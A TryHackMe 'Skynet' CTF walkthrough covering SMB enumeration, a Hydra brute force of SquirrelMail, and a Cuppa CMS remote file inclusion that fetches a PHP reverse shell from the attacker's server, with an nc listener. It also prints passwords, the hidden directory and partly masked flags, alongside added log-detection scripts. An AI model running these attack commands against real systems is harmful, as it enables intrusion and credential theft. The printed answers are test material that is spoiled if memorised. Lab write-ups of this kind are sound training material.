TryHackMe Skynet is a vulnerable Terminator-themed Linux machine created to test our penetration testing knowledge in network scanning, enumeration, attacking Samba shares, RFI attacks and privilege escalation.

Start the Machine
Before everything we need to start our machine and wait around a minute to start our recon phase. After the machine is up and running it’s time to scan the box.
Scan the Target Machine
To scan our machine I will use Nmap with a few arguments to detect the service versions on all ports.
nmap -sV -sC -A -p- 10.10.131.16
Analyse Nmap Scan results
After running the nmap scan I notice a few open ports and four main services – SSH, Apache, Dovecot, Samba.

- 22/tcp SSH
- 80/tcp HTTP
- 110/tcp POP3
- 139/tcp NetBIOS Samba
- 143/tcp IMAP
- 445/tcp NetBIOS Samba
Investigate Port 80 Apache/2.4.18
Open your browser with your Skynet box IP and a dummy Skynet search engine appears.

I tried searching for something but nothing happened. Analyzing the HTML code, I couldn’t find anything relevant!

At this point we get nothing from the web server, so it’s time to search for some folders and find something useful to explore.
Execute gobuster
To find new folders on the webserver I will use gobuster with a public list.
gobuster dir -u http://10.10.131.16 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50

After running gobuster we got some useful folders to investigate, but only one can be opened: the squirrelmail folder!
Info to Explore
- folder squirrelmail
Investigate Dovecot
Open the browser and access the squirrelmail folder. It will open a login page and show us the SquirrelMail version, 1.4.23.
http://10.10.131.16/squirrelmail

At this point we have the version of the SquirrelMail service and a login page, but no clue of any username or email. I’ve tried some basic SQLi but without success. It’s time to try the next available service, Samba.
Investigate Samba
To investigate the Samba service I usually use the SMBMap tool or Nmap.
smbmap -H 10.10.131.16

After executing smbmap we got some juicy info: we can read the anonymous share, and there is an interesting share with the name milesdyson, but we don’t have access to it.
Wait, milesdyson sounds like a username to me; maybe it can be used on the SquirrelMail login page. Keep it in mind. For now I will investigate the anonymous share; maybe I can find some useful files.
Connect to anonymous Share
For now let’s connect to the anonymous share with SMBClient using the command:
smbclient //10.10.131.16/anonymous
We are in, let’s list the files available and search…

We have one file and one folder to investigate.
cat attention.txt

We can confirm our suspicion: the user Miles Dyson exists.

The log1.txt file looks like a password list and maybe can be used as a wordlist to brute force the SquirrelMail login page, let’s try it.
Brute force Squirrel login with Hydra
Here we will test milesdyson as the username and the log1.txt file as a wordlist.
hydra -l milesdyson -P log1.txt 10.10.131.16 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Something is incorrect." -V -F -u

After a successful brute force attack against SquirrelMail we can log in with user milesdyson and password cyborg007haloterminator
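
Seen from the defender's side, the Hydra run above appears in the Apache access log as a burst of POSTs to redirect.php from a single address. The following is an added example (not part of the original write-up) that counts those POSTs in a sliding window over constructed log lines. The threshold, the window, the sample addresses and the status-code meaning (200 for a rejected login, 302 for an accepted one) are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
LOGIN_PATH = "/squirrelmail/src/redirect.php"   # login endpoint used in the walkthrough

def sample_line(ip, sec, status):
    """Build one constructed access-log line (Apache combined format)."""
    return (f'{ip} - - [12/Mar/2021:10:00:{sec:02d} +0000] '
            f'"POST {LOGIN_PATH} HTTP/1.0" {status} 2901 "-" "-"')

# Constructed sample data: documentation-range addresses, not taken from the box.
SAMPLE_LOG = "\n".join(
    [sample_line("198.51.100.23", s, 200) for s in range(1, 9)]  # eight guesses in 8 s
    + [sample_line("198.51.100.23", 9, 302)]                     # then an accepted login
    + [sample_line("192.0.2.10", 30, 200),                       # a user mistyping once
       sample_line("192.0.2.10", 45, 302)]
)

def detect_login_bursts(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag clients sending >= threshold login POSTs within the window."""
    recent = defaultdict(deque)          # client ip -> timestamps still inside the window
    findings = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m or m["method"] != "POST" or m["url"].split("?")[0] != LOGIN_PATH:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:        # drop attempts older than the window
            q.popleft()
        if len(q) >= threshold:
            f = findings.setdefault(
                m["ip"], {"max_posts_in_window": 0, "success_after_burst": False})
            f["max_posts_in_window"] = max(f["max_posts_in_window"], len(q))
            # Assumption: a 302 means the login was accepted. A 302 at the end
            # of a burst means a guessed password and a credential to rotate.
            if m["status"] == "302":
                f["success_after_burst"] = True
    return findings

if __name__ == "__main__":
    for ip, info in detect_login_bursts(SAMPLE_LOG).items():
        print(ip, info)
```
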

Open the first email and extract the Samba password

Connect to milesdyson Share
smbclient //10.10.131.16/milesdyson -U milesdyson
Insert the Password-> )s{A&2Z=F^n_E.B`


Only PDF files and a folder called notes, let’s list it.

One file looks interesting: important.txt


The important.txt file mentions a new directory, /45kra24zxs28v3yd. Open it and we have the Miles Dyson homepage.

Use gobuster to find the administrator page
gobuster dir -u http://10.10.131.16/45kra24zxs28v3yd -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50

Open http://10.10.131.16/45kra24zxs28v3yd/administrator

Cuppa CMS Exploit
Find some useful exploit to run on Cuppa CMS
searchsploit cuppa

Select Reverse Shell
Here I will copy the PHP reverse shell into my home folder and then start a Python web server to
cp /usr/share/webshells/php/php-reverse-shell.php ~
Change the IP and port values in the webshell if needed.

cd /home/user
python3 -m http.server 801
http://10.10.131.16/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.153.122:801/php-reverse-shell.php
Open a new terminal and use netcat or metasploit to listen on port 1234
nc -l 1234
cd milesdyson
cat user.txt
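
The urlConfig request above stands out in the web server's access log, because a parameter of a PHP script carries a full URL pointing at a foreign host. The following is an added example (not part of the original write-up) that flags such parameters in constructed log lines. The client addresses, the timestamps and the own_hosts default are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache access-log lines (sample data, not captured from the box).
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2021:10:05:00 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://203.0.113.5:801/php-reverse-shell.php HTTP/1.1" 200 512
203.0.113.5 - - [12/Mar/2021:10:05:09 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=hTTp%3A%2F%2F203.0.113.5%3A801%2Fa.txt HTTP/1.1" 200 512
192.0.2.10 - - [12/Mar/2021:10:06:00 +0000] "GET /squirrelmail/src/login.php?lang=en HTTP/1.1" 200 2901
192.0.2.10 - - [12/Mar/2021:10:06:30 +0000] "GET /index.php?next=http://10.10.131.16/squirrelmail/ HTTP/1.1" 200 300
"""

REQUEST = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# A parameter value that starts with a URL scheme or a PHP stream wrapper.
SCHEME = re.compile(r'^\s*(?P<scheme>[a-z][a-z0-9+.-]*):(?://)?', re.I)
FETCHABLE = {"http", "https", "ftp", "ftps", "php", "data", "expect", "phar", "zip"}

def find_remote_includes(log_text, own_hosts=("10.10.131.16",)):
    """Return one finding per PHP request parameter that points at a remote resource."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        url = urlsplit(m["url"])
        if not url.path.lower().endswith(".php"):
            continue
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            s = SCHEME.match(value)
            if not s or s["scheme"].lower() not in FETCHABLE:
                continue
            host = urlsplit(value.strip()).hostname
            if host in own_hosts:        # link back to the site itself, not a foreign host
                continue
            findings.append({"client": m["ip"], "path": url.path, "param": name,
                             "scheme": s["scheme"].lower(), "target": host})
    return findings

if __name__ == "__main__":
    for hit in find_remote_includes(SAMPLE_LOG):
        print(hit)
```

On the server itself the lasting fix is to keep allow_url_include set to Off in php.ini and never pass a request parameter to include().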

Our session is limited to the user the web server is running as, www-data. We need to find a way to elevate privileges, but before that let’s brute force the Samba share milesdyson.
Brute Force Samba Service
hydra -l milesdyson -P log1.txt 10.10.131.16 smb -V
No success brute forcing the milesdyson share, OK let’s be more intrusive.
Privilege Escalation
Using Exploit
Search for an exploit for our kernel version
searchsploit kernel 4.8.0


Using Crontab
Root Flag
cat /root/root.txt
Answer Questions
Now it’s time to answer the CTF questions

What is Miles password for his emails?
cyborg007haloterminator
What is the hidden directory?
/45kra24zxs28v3yd
What is the vulnerability called when you can include a remote file for malicious purposes?
remote file inclusion
What is the user flag?
7ce5c2109a40f958099283600a9aeXXX
What is the root flag?
3f0372db24753accc7179a282cd6aXXX